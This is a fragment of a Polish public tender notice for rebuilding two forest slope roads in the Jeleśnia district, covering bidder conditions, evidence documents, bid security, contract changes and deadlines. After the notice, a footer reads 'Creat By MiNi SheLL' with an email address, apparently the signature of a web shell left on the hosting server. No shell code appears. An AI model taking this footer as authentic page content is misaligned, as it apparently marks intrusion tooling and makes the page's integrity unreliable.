class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 Prawa zamówień publicznych, Zamawiający określa warunki udziału w postępowaniu dotyczące:<br/><br/>1.	zdolności do występowania w obrocie gospodarczym: Zamawiający nie stawia warunków w tym zakresie.<br/><br/>2.	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: Zamawiający nie stawia warunków w tym zakresie.<br/><br/>3.	sytuacji ekonomicznej lub finansowej:<br/><br/>3.1.	Zamawiający uzna, że Wykonawca spełnia warunek w zakresie sytuacji, jeżeli Wykonawca posiada ubezpieczenie od odpowiedzialności cywilnej z tytułu prowadzonej działalności gospodarczej na kwotę gwarancyjna nie mniejsza niż:<br/>1)	w zakresie Części 1 zamówienia - 1 000 000,00 złotych<br/>2)	w zakresie Części 2 zamówienia - 690 000,00 złotych.<br/><br/>3.2.	Zamawiający uzna, że Wykonawca spełnia warunek w zakresie sytuacji finansowej, jeżeli Wykonawca dysponuje lub będzie dysponował środkami finansowymi lub zdolnością kredytową w wysokości nie mniejszej niż <br/>1)	w zakresie Części 1 zamówienia - 400 000,00 złotych<br/>2)	w zakresie Części 2 zamówienia - 250 000,00 złotych.<br/><br/>4.	zdolności technicznej lub zawodowej:<br/><br/>4.1.	Zamawiający uzna, że Wykonawca spełnia warunek w zakresie wiedzy i doświadczenia, jeśli Wykonawca okresie ostatnich 5 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie) wykonał co najmniej 2 (dwie) roboty budowlane w zakresie budowy, przebudowy lub remontu dróg na terenach górskich o wartości, co najmniej:<br/>1)	w zakresie Części 1 zamówienia - 600 000,00 złotych brutto każda.<br/>2)	w zakresie Części 2 zamówienia - 400 000,00 złotych brutto każda.<br/><br/>4.2.	Dysponuje lub będzie dysponował osobami zdolnymi do wykonania zamówienia, tj. co najmniej jedną osobą posiadającą uprawnienia budowlane z ograniczeniami lub bez ograniczeń do kierowania robotami budowlanymi, w specjalności drogowej, o których mowa w Prawie budowlanym lub odpowiadające im uprawnienia budowlane uzyskane na podstawie wcześniej obowiązujących przepisów. <br/>Warunek dotyczy Części 1 i Części 2 zamówienia.<br/><br/>UWAGA	Ilekroć w opisie warunków udziału w postępowaniu jest mowa o uprawnieniach, to w przypadku osób będących obywatelami krajów członkowskich Unii Europejskiej oznacza to decyzję w sprawie uznania wymaganych kwalifikacji do wykonywania w Rzeczypospolitej Polskiej samodzielnych funkcji technicznych w budownictwie w zakresie przedmiotu niniejszego zamówienia – zgodnie z właściwymi przepisami, w szczególności z ustawą z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">godnie z art. 274 ust. 1 Prawa zamówień publicznych zamawiający przed wyborem najkorzystniejszej oferty wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu:<br/><br/>1) Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 Prawa zamówień publicznych, w zakresie podstaw wykluczenia z postępowania o których mowa w:<br/>a)	art. 108 ust. 1 pkt 3) Prawa zamówień publicznych, <br/>b) art. 108 ust. 1 pkt 4) Prawa zamówień publicznych, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego, <br/>c)	art. 108 ust. 1 pkt 5) Prawa zamówień publicznych, dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie konkurencji, <br/>d)	art. 108 ust. 1 pkt 6) Prawa zamówień publicznych, <br/>e)	art. 109 ust. 1 pkt 1) Prawa zamówień publicznych odnośnie do naruszenia obowiązków dotyczących płatności podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (Dz. U. z 2019 r. poz. 1170), <br/>f)	art. 109 ust. 1 pkt 7) Prawa zamówień publicznych.<br/>Wzór w/w oświadczenia dołączony zostanie do wezwania w trybie art. 274 ust. 1 Prawa zamówień publicznych.<br/><br/>2)	Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5) Prawa zamówień publicznych, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej.<br/>Wzór w/w oświadczenia dołączony zostanie do wezwania w trybie art. 274 ust. 1 Prawa zamówień publicznych.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie z art. 274 ust. 1 Prawa zamówień publicznych zamawiający przed wyborem najkorzystniejszej oferty wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu:<br/><br/>1)	Informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem. <br/><br/>2)	Dokumentów potwierdzających, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia.<br/><br/>3)	Wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty. <br/>Wzór Wykazu dostaw wykonanych dołączony zostanie do wezwania w trybie art. 274 ust. 1 Prawa zamówień publicznych.<br/><br/>4)	Wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. <br/>Wzór Wykazu osób dołączony zostanie do wezwania w trybie art. 274 ust. 1 Prawa zamówień publicznych.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żąda przedmiotowych środków dowodowych za wyjątkiem przypadku, o którym<br/>mowa w pkt. 2.2.2. SWZ. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Zamawiający wymaga wniesienia wadium w wysokości:<br/>1.1.	w zakresie Części 1 zamówienia - 12 000,00 (słownie: dwanaście tysięcy i 00/100) złotych<br/>1.2.	w zakresie Części 2 zamówienia - 8 000,00 (słownie: osiem tysięcy i 00/100) złotych.<br/><br/>2.	Wadium należy wnieść przed upływem terminu składania ofert i utrzymywać nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 Prawa zamówień publicznych. <br/><br/>3.	Wadium może być wniesione w jednej lub kilku formach wskazanych w art. 97 ust. 7 Prawa zamówień publicznych, tj.:<br/>1)	pieniądzu,<br/>2)	gwarancjach bankowych,<br/>3)	gwarancjach ubezpieczeniowych,<br/>4)	poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/><br/>4.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy w Banku Spółdzielczym w Jeleśni, numer rachunku <br/>78 8118 0002 0000 1007 2000 0010 <br/>z dopiskiem: wadium na zabezpieczenie oferty w postępowaniu Nr 270.9.2021 Przebudowa dwóch dróg stokowych w Nadleśnictwie Jeleśnia.<br/>Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie zostanie zaliczone na rachunku bankowym Zamawiającego. <br/>Wadium musi wpłynąć na wskazany rachunek bankowy Zamawiającego najpóźniej przed upływem terminu składania ofert (decyduje data wpływu na rachunek bankowy Zamawiającego).<br/><br/>5.	Wadium wnoszone w poręczeniach lub gwarancjach należy załączyć do oferty w oryginale w postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym przez wystawcę dokumentu i powinno zawierać następujące elementy:<br/>1)	nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta/poręczyciela oraz wskazanie ich siedzib. Beneficjentem wskazanym w gwarancji lub poręczeniu musi być Państwowe Gospodarstwo leśne Lasy Państwowe Nadleśnictwo Jeleśnia, 34-340 Jeleśnia, ul. Suska 5.<br/>2)	określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,<br/>3)	kwotę gwarancji/poręczenia,<br/>4)	termin ważności gwarancji/poręczenia,<br/>5)	zobowiązanie gwaranta do zapłacenia kwoty gwarancji/poręczenia bezwarunkowo, na pierwsze pisemne żądanie zamawiającego, w sytuacjach określonych w art. 98 ust. 6 Prawa zamówień publicznych.<br/><br/>6.	Z treści wadium wnoszonego w formie: gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości powinno wynikać bezwarunkowe, na pierwsze pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 98 ust. 6 Pzp.<br/><br/>7.	Jeżeli oferta została złożona przez wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum, spółka cywilna), Zamawiający wymaga aby w treści gwarancji wadialnej zostali wymienieni wszyscy wykonawcy wspólnie składający ofertę (członkowie konsorcjum, przedsiębiorcy - wspólnicy spółki cywilnej) lub aby w treści gwarancji wadialnej zostało wyraźnie wskazane, że strona stosunku gwarancyjnego jest liderem/pełnomocnikiem – jednym z uczestników konsorcjum/wspólników spółki cywilnej, działającym także w imieniu i na rzecz innych, wskazanych, uczestników jako wykonawców – którzy wspólnie złożyli lub złożą ofertę w postępowaniu o udzielenie zamówienia publicznego.<br/><br/>8.	W przypadku, gdy wykonawca nie wniósł wadium lub wniósł w sposób nieprawidłowy lub nie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium, w przypadku o którym mowa w art. 98 ust. 2 pkt 3 Prawa zamówień publicznych, zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 14 Pzp.<br/><br/>9.	Zamawiający dokona zwrotu wadium na zasadach określonych w art. 98 ust. 1–5 Pzp.<br/><br/>10.	Zamawiający zatrzymuje wadium wraz z odsetkami na podstawie art. 98 ust. 6 Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną<br/>wprowadzone do treści tej umowy, zawiera Wzór umowy stanowiący załącznik nr 2 do SWZ.<br/><br/>2. Zamawiający przewiduje możliwość zmian postanowień zawartej umowy (tzw. zmiany<br/>kontraktowe w oparciu o art. 455 ust. 1 pkt 1 Prawa zamówień publicznych) w stosunku do treści<br/>oferty, na podstawie której dokonano wyboru Wykonawcy, zgodnie z warunkami zawartymi we<br/>Wzorze umowy stanowiącym załącznik nr 2.1. i 2.2. do SWZ odpowiednio dla Części 1 i Części 2 zamówienia.<br/><br/>3. Zmiana umowy może także nastąpić w przypadkach, o których mowa w art. 455 ust. 1 pkt 2-4<br/>oraz ust. 2 Prawa zamówień publicznych. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-05 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platformie JOSEPHINE dostępnej pod adresem https://www.josephine.proebiz.com/pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-05 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-04</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com